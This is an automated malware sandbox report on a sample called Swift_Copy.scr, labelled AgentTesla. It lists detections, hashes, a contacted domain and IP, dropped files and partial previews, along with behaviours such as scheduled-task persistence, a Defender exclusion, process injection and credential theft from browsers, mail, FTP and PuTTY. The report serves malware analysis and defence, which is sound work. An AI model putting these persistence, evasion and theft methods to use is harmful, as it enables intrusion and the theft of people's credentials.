                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430207 Sample: Swift_Copy.scr Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 38 mail.sigmamotorspk.com 2->38 40 sigmamotorspk.com 2->40 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Sigma detected: Scheduled temp file as task from temp location 2->48 50 8 other signatures 2->50 8 Swift_Copy.scr 7 2->8         started        12 WAuLmtFUmD.exe 5 2->12         started        signatures3 process4 file5 34 C:\Users\user\AppData\...\WAuLmtFUmD.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\tmp7FF5.tmp, XML 8->36 dropped 52 Uses schtasks.exe or at.exe to add and modify task schedules 8->52 54 Writes to foreign memory regions 8->54 56 Allocates memory in foreign processes 8->56 58 Adds a directory exclusion to Windows Defender 8->58 14 RegSvcs.exe 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        60 Multi AV Scanner detection for dropped file 12->60 62 Machine Learning detection for dropped file 12->62 64 Injects a PE file into a foreign processes 12->64 22 RegSvcs.exe 2 12->22         started        24 schtasks.exe 1 12->24         started        signatures6 process7 dnsIp8 42 sigmamotorspk.com 65.21.71.87, 49709, 49711, 587 CP-ASDE United States 14->42 66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->66 68 Loading BitLocker PowerShell Module 18->68 26 WmiPrvSE.exe 18->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->70 72 Tries to steal Mail credentials (via file / registry access) 22->72 74 Tries to harvest and steal ftp login credentials 22->74 76 Tries to harvest and steal browser information (history, passwords, etc) 22->76 32 conhost.exe 24->32         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Swift_Copy.scr45%VirustotalBrowse
                    Swift_Copy.scr71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Swift_Copy.scr100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe45%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    sigmamotorspk.com0%VirustotalBrowse
                    mail.sigmamotorspk.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://sigmamotorspk.com0%Avira URL Cloudsafe
                    http://mail.sigmamotorspk.com0%Avira URL Cloudsafe
                    http://mail.sigmamotorspk.com0%VirustotalBrowse
                    http://sigmamotorspk.com0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    sigmamotorspk.com
                    		65.21.71.87
                    		truefalseunknown
                    mail.sigmamotorspk.com
                    		unknown
                    		unknowntrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://mail.sigmamotorspk.comRegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://account.dyn.com/Swift_Copy.scr, 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSwift_Copy.scr, 00000000.00000002.2106668901.00000000033F6000.00000004.00000800.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2135864386.00000000035B4000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0Swift_Copy.scr, WAuLmtFUmD.exe.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://sigmamotorspk.comRegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        65.21.71.87
                        		sigmamotorspk.comUnited States
                        		199592CP-ASDEfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1430207
                        Start date and time:2024-04-23 10:18:50 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Swift_Copy.scr
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winSCR@16/11@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 172
                        • Number of non-executed functions: 11
                        Cookbook Comments:
                        • Found application associated with file extension: .scr

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:19:41API Interceptor2x Sleep call for process: Swift_Copy.scr modified
                        10:19:44Task SchedulerRun new task: WAuLmtFUmD path: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                        10:19:44API Interceptor16x Sleep call for process: powershell.exe modified
                        10:19:46API Interceptor62x Sleep call for process: RegSvcs.exe modified
                        10:19:46API Interceptor2x Sleep call for process: WAuLmtFUmD.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        65.21.71.87KhT.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CP-ASDEhttp://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                          • 65.21.119.50
                          arm7.elfGet hashmaliciousMirai, MoobotBrowse
                          • 65.20.154.20
                          CrHadzetWq.exeGet hashmaliciousUnknownBrowse
                          • 65.20.106.109
                          CrHadzetWq.exeGet hashmaliciousUnknownBrowse
                          • 65.20.106.109
                          KhT.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 65.21.71.87
                          S17OHHT4VG.exeGet hashmaliciousRedLineBrowse
                          • 65.21.119.55
                          AH13mMVUYY.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 65.21.20.120
                          2luFBixrAW.elfGet hashmaliciousMiraiBrowse
                          • 65.20.206.151
                          GE1fUFlJuQ.exeGet hashmaliciousRisePro StealerBrowse
                          • 65.21.21.176
                          906o5yr1NE.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                          • 65.21.94.13

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift_Copy.scr.log

                          Download File
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WAuLmtFUmD.exe.log

                          Download File
                          Process:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.378486415808052
                          Encrypted:false
                          SSDEEP:48:fWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHyIFvKLgZ2KRHWLOug8s
                          MD5:8702CDF7B229DD465C49606EE859BBB5
                          SHA1:F25F3BC8D5BD1DB1455D2EB3B5A9A254A6F8AEDA
                          SHA-256:3090B8AE8E09FFD3DA747CF1B80DEC6C69023D11ECC710B3FAD2C5CA412DBEC3
                          SHA-512:057E9A76121613A3F8CCD475F8880F17939A444526D3DCD23416AB0E0AAC623FAD9704443D834462E036914A944E1D3105412A357F87888E3F46CD11FBBBE5A4
                          Malicious:false
                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abcymikj.uat.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctpggwhh.kpd.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irgxgp21.is2.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcggdhsd.dzj.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp

                          Download File
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1583
                          Entropy (8bit):5.103033954025875
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiv
                          MD5:7A45F95E7BDC31A16D55C37EB1FF32D6
                          SHA1:A45AC8F18727D46EBEF864A7AE59A9803B7DC365
                          SHA-256:6EF7864A8503F7B7223C78916F3AE7CF2B3439EEFFBC021773FFE8EC51878BD8
                          SHA-512:1241CC512D90061A3F3CB95468B4D6CDFEBD682455C210721F0F964805FEFE5EA1572B891EC66AE4E9B8CA14B48B96988122D90ACB3FE10ADB35DEAE5AF74243
                          Malicious:true
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                          C:\Users\user\AppData\Local\Temp\tmp8D33.tmp

                          Download File
                          Process:C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1583
                          Entropy (8bit):5.103033954025875
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiv
                          MD5:7A45F95E7BDC31A16D55C37EB1FF32D6
                          SHA1:A45AC8F18727D46EBEF864A7AE59A9803B7DC365
                          SHA-256:6EF7864A8503F7B7223C78916F3AE7CF2B3439EEFFBC021773FFE8EC51878BD8
                          SHA-512:1241CC512D90061A3F3CB95468B4D6CDFEBD682455C210721F0F964805FEFE5EA1572B891EC66AE4E9B8CA14B48B96988122D90ACB3FE10ADB35DEAE5AF74243
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                          C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe

                          Download File
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):736776
                          Entropy (8bit):7.867689633707492
                          Encrypted:false
                          SSDEEP:12288:RHyraUHvmSOjnNhxga6rA/zejc1KGaEPMcUf1woPwo8ncQGknucdM3faVgkR:dCLWnjPGZyxUdwoPSncbknuKiaH
                          MD5:A474CCDA551682DCB92EFE1402DD02CB
                          SHA1:6A147A094A142D0DDF04C97B6B74626BE611C189
                          SHA-256:1680D6FF15E6C5B4A4098B88073646BB4CFF58B6C51A916BED32401B02A64A6B
                          SHA-512:656FC590D3B354FDF389DFA9B858A1C9A52D787DE3C3644735862CCAAB163F9FBB925E03C8721277FC6A33594DC6280B0230AE0823972149774755010EA61BBD
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 71%
                          • Antivirus: Virustotal, Detection: 45%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&f................................. ........@.. .......................`............@.................................p...K.... ...................6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........q...........................................................0..A....... :........%....(......... .........%.u...(.....v...(....*.....&*....0..V........(.......r...p}.....r...p}....+..r...p}.....r...p}..... ....}.....r...p}....+...}....*...0..B........(........}......}....+...}.......}.......}.......}....+....}....*...0............{......*..&...}....*...0............{......*..&...}....*...0............{......*..&...}....*...0............{......*..&...}....*...0..

                          C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.867689633707492
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.96%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Swift_Copy.scr
                          File size:736'776 bytes
                          MD5:a474ccda551682dcb92efe1402dd02cb
                          SHA1:6a147a094a142d0ddf04c97b6b74626be611c189
                          SHA256:1680d6ff15e6c5b4a4098b88073646bb4cff58b6c51a916bed32401b02a64a6b
                          SHA512:656fc590d3b354fdf389dfa9b858a1c9a52d787de3c3644735862ccaab163f9fbb925e03c8721277fc6a33594dc6280b0230ae0823972149774755010ea61bbd
                          SSDEEP:12288:RHyraUHvmSOjnNhxga6rA/zejc1KGaEPMcUf1woPwo8ncQGknucdM3faVgkR:dCLWnjPGZyxUdwoPSncbknuKiaH
                          TLSH:FBF412086ABBBF4BDABD47B11561CD1453F2B06A5232D3070FC760EA2DA1FD48A91B53
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&f................................. ........@.. .......................`............@................................

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x4b1bbe
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6626108D [Mon Apr 22 07:23:57 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                          Subject Chain
                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                          Version:3
                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                          Serial:7C1118CBBADC95DA3752C46E47A27438

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
